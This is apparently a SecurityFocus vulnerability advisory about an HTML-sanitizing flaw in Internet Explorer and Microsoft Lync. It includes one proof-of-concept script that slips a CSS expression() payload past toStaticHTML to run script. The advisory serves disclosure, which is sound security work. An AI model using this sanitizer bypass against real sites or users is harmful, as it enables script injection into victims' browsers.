Microsoft Internet Explorer And Microsoft Lync HTML Sanitizing Information Disclosure Vulnerability

To exploit this issue, an attacker must entice an unsuspecting user to view a malicious webpage.

The following example code is available:

<script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>


 

Privacy Statement
Copyright 2010, SecurityFocus